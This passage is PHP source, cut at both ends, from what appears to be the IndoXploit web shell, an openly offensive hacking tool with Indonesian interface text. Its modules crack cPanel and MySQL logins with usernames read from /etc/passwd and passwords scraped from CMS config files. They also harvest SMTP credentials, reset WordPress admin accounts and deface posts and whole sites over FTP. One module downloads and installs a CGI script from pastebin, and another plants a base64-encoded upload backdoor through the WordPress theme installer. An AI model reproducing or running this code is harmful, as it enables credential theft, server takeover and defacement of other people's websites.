  701. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  702. echo $url_target2;
  703. } else {
  704. echo $url_target;
  705. }
  706. if(!$update OR !$conn OR !$db) {
  707. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  708. } else {
  709. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  710. }
  711. mysql_close($conn);
  712. }
  713. }
  714. }
  715. } else {
  716. echo "<center>
  717. <h1>Auto Edit User Config</h1>
  718. <form method='post'>
  719. DIR Config: <br>
  720. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  721. Set User & Pass: <br>
  722. <input type='text' name='user_baru' value='indoxploit' placeholder='user_baru'><br>
  723. <input type='text' name='pass_baru' value='indoxploit' placeholder='pass_baru'><br>
  724. <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
  725. </form>
  726. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  727. ";
  728. }
  729. } elseif($_GET['do'] == 'cpanel') {
  730. if($_POST['crack']) {
  731. $usercp = explode("\r\n", $_POST['user_cp']);
  732. $passcp = explode("\r\n", $_POST['pass_cp']);
  733. $i = 0;
  734. foreach($usercp as $ucp) {
  735. foreach($passcp as $pcp) {
  736. if(@mysql_connect('localhost', $ucp, $pcp)) {
  737. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  738. } else {
  739. $_SESSION[$ucp] = "1";
  740. $_SESSION[$pcp] = "1";
  741. if($ucp == '' || $pcp == '') {
  742.  
  743. } else {
  744. $i++;
  745. if(function_exists('posix_getpwuid')) {
  746. $domain_cp = file_get_contents("/etc/named.conf");
  747. if($domain_cp == '') {
  748. $dom = "<font color=red>gabisa ambil nama domain nya</font>";
  749. } else {
  750. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  751. foreach($domains_cp[1] as $dj) {
  752. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  753. $user_cp_url = $user_cp_url['name'];
  754. if($user_cp_url == $ucp) {
  755. $dom = "<a href='http://$dj/' target='_blank'><font color=lime>$dj</font></a>";
  756. break;
  757. }
  758. }
  759. }
  760. } else {
  761. $dom = "<font color=red>function is Disable by system</font>";
  762. }
  763. echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>) domain ($dom)<br>";
  764. }
  765. }
  766. }
  767. }
  768. }
  769. if($i == 0) {
  770. } else {
  771. echo "<br>sukses nyolong ".$i." Cpanel by <font color=lime>IndoXploit.</font>";
  772. }
  773. } else {
  774. echo "<center>
  775. <form method='post'>
  776. USER: <br>
  777. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  778. $_usercp = fopen("/etc/passwd","r");
  779. while($getu = fgets($_usercp)) {
  780. if($getu == '' || !$_usercp) {
  781. echo "<font color=red>Can't read /etc/passwd</font>";
  782. } else {
  783. preg_match_all("/(.*?):x:/", $getu, $u);
  784. foreach($u[1] as $user_cp) {
  785. if(is_dir("/home/$user_cp/public_html")) {
  786. echo "$user_cp\n";
  787. }
  788. }
  789. }
  790. }
  791. echo "</textarea><br>
  792. PASS: <br>
  793. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  794. function cp_pass($dir) {
  795. $pass = "";
  796. $dira = scandir($dir);
  797. foreach($dira as $dirb) {
  798. if(!is_file("$dir/$dirb")) continue;
  799. $ambil = file_get_contents("$dir/$dirb");
  800. if(preg_match("/WordPress/", $ambil)) {
  801. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  802. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  803. $pass .= ambilkata($ambil,"password = '","'")."\n";
  804. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  805. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  806. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  807. $pass .= ambilkata($ambil,'password = "','"')."\n";
  808. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  809. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  810. } elseif(preg_match("/client/", $ambil)) {
  811. preg_match("/password=(.*)/", $ambil, $pass1);
  812. $pass .= $pass1[1]."\n";
  813. if(preg_match('/"/', $pass1[1])) {
  814. $pass1[1] = str_replace('"', "", $pass1[1]);
  815. $pass .= $pass1[1]."\n";
  816. }
  817. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  818. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  819. }
  820. }
  821. echo $pass;
  822. }
  823. $cp_pass = cp_pass($dir);
  824. echo $cp_pass;
  825. echo "</textarea><br>
  826. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  827. </form>
  828. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  829. }
  830. } elseif($_GET['do'] == 'cpftp_auto') {
  831. if($_POST['crack']) {
  832. $usercp = explode("\r\n", $_POST['user_cp']);
  833. $passcp = explode("\r\n", $_POST['pass_cp']);
  834. $i = 0;
  835. foreach($usercp as $ucp) {
  836. foreach($passcp as $pcp) {
  837. if(@mysql_connect('localhost', $ucp, $pcp)) {
  838. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  839. } else {
  840. $_SESSION[$ucp] = "1";
  841. $_SESSION[$pcp] = "1";
  842. if($ucp == '' || $pcp == '') {
  843. //
  844. } else {
  845. echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  846. $ftp_conn = ftp_connect(gethostbyname($_SERVER['HTTP_HOST']));
  847. $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
  848. if((!$ftp_login) || (!$ftp_conn)) {
  849. echo "[+] <font color=red>Login Gagal</font><br><br>";
  850. } else {
  851. echo "[+] <font color=lime>Login Sukses</font><br>";
  852. $fi = htmlspecialchars($_POST['file_deface']);
  853. $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
  854. if($deface) {
  855. $i++;
  856. echo "[+] <font color=lime>Deface Sukses</font><br>";
  857. if(function_exists('posix_getpwuid')) {
  858. $domain_cp = file_get_contents("/etc/named.conf");
  859. if($domain_cp == '') {
  860. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  861. } else {
  862. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  863. foreach($domains_cp[1] as $dj) {
  864. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  865. $user_cp_url = $user_cp_url['name'];
  866. if($user_cp_url == $ucp) {
  867. echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
  868. break;
  869. }
  870. }
  871. }
  872. } else {
  873. echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  874. }
  875. } else {
  876. echo "[-] <font color=red>Deface Gagal</font><br><br>";
  877. }
  878. }
  879. //echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  880. }
  881. }
  882. }
  883. }
  884. }
  885. if($i == 0) {
  886. } else {
  887. echo "<br>sukses deface ".$i." Cpanel by <font color=lime>IndoXploit.</font>";
  888. }
  889. } else {
  890. echo "<center>
  891. <form method='post'>
  892. Filename: <br>
  893. <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
  894. Deface Page: <br>
  895. <input type='text' name='deface' placeholder='http://www.web-yang-udah-di-deface.com/filemu.php' style='width: 450px;'><br>
  896. USER: <br>
  897. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  898. $_usercp = fopen("/etc/passwd","r");
  899. while($getu = fgets($_usercp)) {
  900. if($getu == '' || !$_usercp) {
  901. echo "<font color=red>Can't read /etc/passwd</font>";
  902. } else {
  903. preg_match_all("/(.*?):x:/", $getu, $u);
  904. foreach($u[1] as $user_cp) {
  905. if(is_dir("/home/$user_cp/public_html")) {
  906. echo "$user_cp\n";
  907. }
  908. }
  909. }
  910. }
  911. echo "</textarea><br>
  912. PASS: <br>
  913. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  914. function cp_pass($dir) {
  915. $pass = "";
  916. $dira = scandir($dir);
  917. foreach($dira as $dirb) {
  918. if(!is_file("$dir/$dirb")) continue;
  919. $ambil = file_get_contents("$dir/$dirb");
  920. if(preg_match("/WordPress/", $ambil)) {
  921. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  922. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  923. $pass .= ambilkata($ambil,"password = '","'")."\n";
  924. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  925. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  926. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  927. $pass .= ambilkata($ambil,'password = "','"')."\n";
  928. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  929. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  930. } elseif(preg_match("/client/", $ambil)) {
  931. preg_match("/password=(.*)/", $ambil, $pass1);
  932. $pass .= $pass1[1]."\n";
  933. if(preg_match('/"/', $pass1[1])) {
  934. $pass1[1] = str_replace('"', "", $pass1[1]);
  935. $pass .= $pass1[1]."\n";
  936. }
  937. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  938. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  939. }
  940. }
  941. echo $pass;
  942. }
  943. $cp_pass = cp_pass($dir);
  944. echo $cp_pass;
  945. echo "</textarea><br>
  946. <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
  947. </form>
  948. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  949. }
  950. } elseif($_GET['do'] == 'smtp') {
  951. echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  952. function scj($dir) {
  953. $dira = scandir($dir);
  954. foreach($dira as $dirb) {
  955. if(!is_file("$dir/$dirb")) continue;
  956. $ambil = file_get_contents("$dir/$dirb");
  957. $ambil = str_replace("$", "", $ambil);
  958. if(preg_match("/JConfig|joomla/", $ambil)) {
  959. $smtp_host = ambilkata($ambil,"smtphost = '","'");
  960. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  961. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  962. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  963. $smtp_port = ambilkata($ambil,"smtpport = '","'");
  964. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  965. echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
  966. echo "SMTP port: <font color=lime>$smtp_port</font><br>";
  967. echo "SMTP user: <font color=lime>$smtp_user</font><br>";
  968. echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
  969. echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
  970. echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
  971. }
  972. }
  973. }
  974. $smpt_hunter = scj($dir);
  975. echo $smpt_hunter;
  976. } elseif($_GET['do'] == 'auto_wp') {
  977. if($_POST['hajar']) {
  978. $title = htmlspecialchars($_POST['new_title']);
  979. $pn_title = str_replace(" ", "-", $title);
  980. if($_POST['cek_edit'] == "Y") {
  981. $script = $_POST['edit_content'];
  982. } else {
  983. $script = $title;
  984. }
  985. $conf = $_POST['config_dir'];
  986. $scan_conf = scandir($conf);
  987. foreach($scan_conf as $file_conf) {
  988. if(!is_file("$conf/$file_conf")) continue;
  989. $config = file_get_contents("$conf/$file_conf");
  990. if(preg_match("/WordPress/", $config)) {
  991. $dbhost = ambilkata($config,"DB_HOST', '","'");
  992. $dbuser = ambilkata($config,"DB_USER', '","'");
  993. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  994. $dbname = ambilkata($config,"DB_NAME', '","'");
  995. $dbprefix = ambilkata($config,"table_prefix = '","'");
  996. $prefix = $dbprefix."posts";
  997. $option = $dbprefix."options";
  998. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  999. $db = mysql_select_db($dbname);
  1000. $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  1001. $result = mysql_fetch_array($q);
  1002. $id = $result[ID];
  1003. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1004. $result2 = mysql_fetch_array($q2);
  1005. $target = $result2[option_value];
  1006. $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
  1007. $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
  1008. echo "<div style='margin: 5px auto;'>";
  1009. if($target == '') {
  1010. echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
  1011. } else {
  1012. echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
  1013. }
  1014. if(!$update OR !$conn OR !$db) {
  1015. echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
  1016. } else {
  1017. echo "<font color=lime>sukses di ganti.</font><br>";
  1018. }
  1019. echo "</div>";
  1020. mysql_close($conn);
  1021. }
  1022. }
  1023. } else {
  1024. echo "<center>
  1025. <h1>Auto Edit Title+Content WordPress</h1>
  1026. <form method='post'>
  1027. DIR Config: <br>
  1028. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  1029. Set Title: <br>
  1030. <input type='text' name='new_title' value='Hacked by IndoXploit' placeholder='New Title'><br><br>
  1031. Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
  1032. <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
  1033. <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
  1034. <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
  1035. </form>
  1036. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  1037. ";
  1038. }
  1039. } elseif($_GET['do'] == 'zoneh') {
  1040. if($_POST['submit']) {
  1041. $domain = explode("\r\n", $_POST['url']);
  1042. $nick = $_POST['nick'];
  1043. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  1044. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  1045. function zoneh($url,$nick) {
  1046. $ch = curl_init("http://www.zone-h.com/notify/single");
  1047. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1048. curl_setopt($ch, CURLOPT_POST, true);
  1049. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  1050. return curl_exec($ch);
  1051. curl_close($ch);
  1052. }
  1053. foreach($domain as $url) {
  1054. $zoneh = zoneh($url,$nick);
  1055. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  1056. echo "$url -> <font color=lime>OK</font><br>";
  1057. } else {
  1058. echo "$url -> <font color=red>ERROR</font><br>";
  1059. }
  1060. }
  1061. } else {
  1062. echo "<center><form method='post'>
  1063. <u>Defacer</u>: <br>
  1064. <input type='text' name='nick' size='50' value='IndoXploit'><br>
  1065. <u>Domains</u>: <br>
  1066. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  1067. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  1068. </form>";
  1069. }
  1070. echo "</center>";
  1071. } elseif($_GET['do'] == 'cgi') {
  1072. $cgi_dir = mkdir('idx_cgi', 0755);
  1073. $file_cgi = "idx_cgi/cgi.izo";
  1074. $isi_htcgi = "AddHandler cgi-script .izo";
  1075. $htcgi = fopen(".htaccess", "w");
  1076. $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
  1077. $cgi = fopen($file_cgi, "w");
  1078. fwrite($cgi, $cgi_script);
  1079. fwrite($htcgi, $isi_htcgi);
  1080. chmod($file_cgi, 0755);
  1081. echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
  1082. } elseif($_GET['do'] == 'fake_root') {
  1083. ob_start();
  1084. function reverse($url) {
  1085. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  1086. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  1087. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
  1088. curl_setopt($ch, CURLOPT_HEADER, 0);
  1089. curl_setopt($ch, CURLOPT_POST, 1);
  1090. $resp = curl_exec($ch);
  1091. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  1092. $array = explode(",,", $resp);
  1093. unset($array[0]);
  1094. foreach($array as $lnk) {
  1095. $lnk = "http://$lnk";
  1096. $lnk = str_replace(",", "", $lnk);
  1097. echo $lnk."\n";
  1098. ob_flush();
  1099. flush();
  1100. }
  1101. curl_close($ch);
  1102. }
  1103. function cek($url) {
  1104. $ch = curl_init($url);
  1105. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  1106. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  1107. $resp = curl_exec($ch);
  1108. return $resp;
  1109. }
  1110. $cwd = getcwd();
  1111. $ambil_user = explode("/", $cwd);
  1112. $user = $ambil_user[2];
  1113. if($_POST['reverse']) {
  1114. $site = explode("\r\n", $_POST['url']);
  1115. $file = $_POST['file'];
  1116. foreach($site as $url) {
  1117. $cek = cek("$url/~$user/$file");
  1118. if(preg_match("/hacked/i", $cek)) {
  1119. echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
  1120. }
  1121. }
  1122. } else {
  1123. echo "<center><form method='post'>
  1124. Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
  1125. User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
  1126. Domain: <br>
  1127. <textarea style='width: 450px; height: 250px;' name='url'>";
  1128. reverse($_SERVER['HTTP_HOST']);
  1129. echo "</textarea><br>
  1130. <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
  1131. </form><br>
  1132. NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
  1133. }
  1134. } elseif($_GET['do'] == 'adminer') {
  1135. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  1136. function adminer($url, $isi) {
  1137. $fp = fopen($isi, "w");
  1138. $ch = curl_init();
  1139. curl_setopt($ch, CURLOPT_URL, $url);
  1140. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  1141. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  1142. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  1143. curl_setopt($ch, CURLOPT_FILE, $fp);
  1144. return curl_exec($ch);
  1145. curl_close($ch);
  1146. fclose($fp);
  1147. ob_flush();
  1148. flush();
  1149. }
  1150. if(file_exists('adminer.php')) {
  1151. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1152. } else {
  1153. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  1154. echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  1155. } else {
  1156. echo "<center><font color=red>gagal buat file adminer</font></center>";
  1157. }
  1158. }
  1159. } elseif($_GET['do'] == 'auto_dwp') {
  1160. if($_POST['auto_deface_wp']) {
  1161. function anucurl($sites) {
  1162. $ch = curl_init($sites);
  1163. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1164. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1165. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1166. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1167. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1168. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1169. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1170. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1171. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1172. $data = curl_exec($ch);
  1173. curl_close($ch);
  1174. return $data;
  1175. }
  1176. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  1177. $post = array(
  1178. "log" => "$userr",
  1179. "pwd" => "$pass",
  1180. "rememberme" => "forever",
  1181. "wp-submit" => "$wp_submit",
  1182. "redirect_to" => "$web",
  1183. "testcookie" => "1",
  1184. );
  1185. $ch = curl_init($cek);
  1186. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1187. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1188. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1189. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1190. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1191. curl_setopt($ch, CURLOPT_POST, 1);
  1192. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  1193. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1194. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1195. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1196. $data = curl_exec($ch);
  1197. curl_close($ch);
  1198. return $data;
  1199. }
  1200. $scan = $_POST['link_config'];
  1201. $link_config = scandir($scan);
  1202. $script = htmlspecialchars($_POST['script']);
  1203. $user = "indoxploit";
  1204. $pass = "indoxploit";
  1205. $passx = md5($pass);
  1206. foreach($link_config as $dir_config) {
  1207. if(!is_file("$scan/$dir_config")) continue;
  1208. $config = file_get_contents("$scan/$dir_config");
  1209. if(preg_match("/WordPress/", $config)) {
  1210. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1211. $dbuser = ambilkata($config,"DB_USER', '","'");
  1212. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1213. $dbname = ambilkata($config,"DB_NAME', '","'");
  1214. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1215. $prefix = $dbprefix."users";
  1216. $option = $dbprefix."options";
  1217. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1218. $db = mysql_select_db($dbname);
  1219. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1220. $result = mysql_fetch_array($q);
  1221. $id = $result[ID];
  1222. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1223. $result2 = mysql_fetch_array($q2);
  1224. $target = $result2[option_value];
  1225. if($target == '') {
  1226. echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1227. } else {
  1228. echo "[+] $target <br>";
  1229. }
  1230. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  1231. if(!$conn OR !$db OR !$update) {
  1232. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  1233. mysql_close($conn);
  1234. } else {
  1235. $site = "$target/wp-login.php";
  1236. $site2 = "$target/wp-admin/theme-install.php?upload";
  1237. $b1 = anucurl($site2);
  1238. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  1239. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  1240. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  1241. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  1242. $www = "m.php";
  1243. $fp5 = fopen($www,"w");
  1244. fputs($fp5,$upload3);
  1245. $post2 = array(
  1246. "_wpnonce" => "$anu2",
  1247. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  1248. "themezip" => "@$www",
  1249. "install-theme-submit" => "Install Now",
  1250. );
  1251. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  1252. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1253. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1254. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1255. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1256. curl_setopt($ch, CURLOPT_POST, 1);
  1257. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  1258. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1259. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1260. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  1261. $data3 = curl_exec($ch);
  1262. curl_close($ch);
  1263. $y = date("Y");
  1264. $m = date("m");
  1265. $namafile = "id.php";
  1266. $fpi = fopen($namafile,"w");
  1267. fputs($fpi,$script);
  1268. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  1269. curl_setopt($ch6, CURLOPT_POST, true);
  1270. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  1271. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  1272. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  1273. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  1274. curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
  1275. $postResult = curl_exec($ch6);
  1276. curl_close($ch6);
  1277. $as = "$target/k.php";
  1278. $bs = anucurl($as);
  1279. if(preg_match("#$script#is", $bs)) {
  1280. echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  1281. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  1282. } else {
  1283. echo "[-] <font color='red'>gagal mepes...</font><br>";
  1284. echo "[!!] coba aja manual: <br>";
  1285. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  1286. echo "[+] username: <font color=lime>$user</font><br>";
  1287. echo "[+] password: <font color=lime>$pass</font><br><br>";
  1288. }
  1289. mysql_close($conn);
  1290. }
  1291. }
  1292. }
  1293. } else {
  1294. echo "<center><h1>WordPress Auto Deface</h1>
  1295. <form method='post'>
  1296. <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
  1297. <input type='text' name='script' height='10' size='50' placeholder='Hacked by IndoXploit' required><br>
  1298. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  1299. </form>
  1300. <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
  1301. </center>";
  1302. }
  1303. } elseif($_GET['do'] == 'auto_dwp2') {
  1304. if($_POST['auto_deface_wp']) {
  1305. function anucurl($sites) {
  1306. $ch = curl_init($sites);
  1307. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1308. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  1309. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  1310. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  1311. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  1312. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  1313. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  1314. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  1315. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  1316. $data = curl_exec($ch);
  1317. curl_close($ch);
  1318. return $data;
  1319. }
  1320. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  1321. $post = array(
  1322. "log" => "$userr",
  1323. "pwd" => "$pass",
  1324. "rememberme" => "forever",
  1325. "wp-submit" => "$wp_submit",
  1326. "redirect_to" => "$web",
  1327. "testcookie" => "1",
  1328. );
  1329. $ch = curl_init($cek);
  1330. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  1331. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
